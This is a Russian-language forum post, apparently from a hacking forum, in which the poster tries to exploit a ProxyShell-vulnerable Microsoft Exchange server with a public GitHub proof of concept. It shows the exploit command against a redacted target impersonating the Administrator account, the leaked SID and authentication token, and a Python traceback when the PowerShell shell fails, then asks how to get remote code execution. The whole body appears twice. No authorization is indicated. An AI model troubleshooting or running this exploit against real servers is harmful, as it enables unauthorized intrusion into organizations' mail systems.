Нашел уязвимую к проксишел машину.
Пытаюсь пробить этим эксплойтом:https://github.com/dmaasland/proxyshell-poc
Вывод:
python proxyshell_rce.py -u https://**** -e Administrator@****.com
LegacyDN: /o=**** /ou=DOMAIN/cn=Recipients/cn=Administrator
SID: S-1-5-21-1358900890-1791041565-635260049-500
Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB5BZG1pbmlzdHJhdG9yQGdsb2JlZXhwcmVzcy5jb21VLFMtMS01LTIxLTEzNTg5MDA4OTAtMTc5MTA0MTU2NS02MzUyNjAwNDktNTAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA
PS>
Когда ввожу любую команду ,эксплойт вылетает с такими ошибками :
127.0.0.1 - - [25/Oct/2022 10:59:06] "POST /wsman HTTP/1.1" 200 -
Traceback (most recent call last):
File "/home/kali/proxyshell/proxyshell-poc/proxyshell_rce.py", line 366, in <module>
main()
File "/home/kali/proxyshell/proxyshell-poc/proxyshell_rce.py", line 355, in main
shell(input('PS> '), local_port, proxyshell)
File "/home/kali/proxyshell/proxyshell-poc/proxyshell_rce.py", line 207, in shell
with RunspacePool(wsman, configuration_name='Microsoft.Exchange') as pool:
File "/usr/lib/python3/dist-packages/pypsrp/powershell.py", line 205, in __enter__
self.open()
File "/usr/lib/python3/dist-packages/pypsrp/powershell.py", line 513, in open
self.shell.open(options, open_content)
File "/usr/lib/python3/dist-packages/pypsrp/shell.py", line 203, in open
response = self.wsman.create(self.resource_uri, shell,
File "/usr/lib/python3/dist-packages/pypsrp/wsman.py", line 269, in create
res = self.invoke(WSManAction.CREATE, resource_uri, resource,
File "/usr/lib/python3/dist-packages/pypsrp/wsman.py", line 400, in invoke
response_xml = ET.fromstring(response)
File "/usr/lib/python3.10/xml/etree/ElementTree.py", line 1343, in XML
return parser.close()
xml.etree.ElementTree.ParseError: no element found: line 1, column 0
Попробовал с другим эксплойтом ,тоже самое.
Машина уязвима к rce?Если да то что сделать?
Пытаюсь пробить этим эксплойтом:https://github.com/dmaasland/proxyshell-poc
Вывод:
python proxyshell_rce.py -u https://**** -e Administrator@****.com
LegacyDN: /o=**** /ou=DOMAIN/cn=Recipients/cn=Administrator
SID: S-1-5-21-1358900890-1791041565-635260049-500
Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB5BZG1pbmlzdHJhdG9yQGdsb2JlZXhwcmVzcy5jb21VLFMtMS01LTIxLTEzNTg5MDA4OTAtMTc5MTA0MTU2NS02MzUyNjAwNDktNTAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA
PS>
Когда ввожу любую команду ,эксплойт вылетает с такими ошибками :
127.0.0.1 - - [25/Oct/2022 10:59:06] "POST /wsman HTTP/1.1" 200 -
Traceback (most recent call last):
File "/home/kali/proxyshell/proxyshell-poc/proxyshell_rce.py", line 366, in <module>
main()
File "/home/kali/proxyshell/proxyshell-poc/proxyshell_rce.py", line 355, in main
shell(input('PS> '), local_port, proxyshell)
File "/home/kali/proxyshell/proxyshell-poc/proxyshell_rce.py", line 207, in shell
with RunspacePool(wsman, configuration_name='Microsoft.Exchange') as pool:
File "/usr/lib/python3/dist-packages/pypsrp/powershell.py", line 205, in __enter__
self.open()
File "/usr/lib/python3/dist-packages/pypsrp/powershell.py", line 513, in open
self.shell.open(options, open_content)
File "/usr/lib/python3/dist-packages/pypsrp/shell.py", line 203, in open
response = self.wsman.create(self.resource_uri, shell,
File "/usr/lib/python3/dist-packages/pypsrp/wsman.py", line 269, in create
res = self.invoke(WSManAction.CREATE, resource_uri, resource,
File "/usr/lib/python3/dist-packages/pypsrp/wsman.py", line 400, in invoke
response_xml = ET.fromstring(response)
File "/usr/lib/python3.10/xml/etree/ElementTree.py", line 1343, in XML
return parser.close()
xml.etree.ElementTree.ParseError: no element found: line 1, column 0
Попробовал с другим эксплойтом ,тоже самое.
Машина уязвима к rce?Если да то что сделать?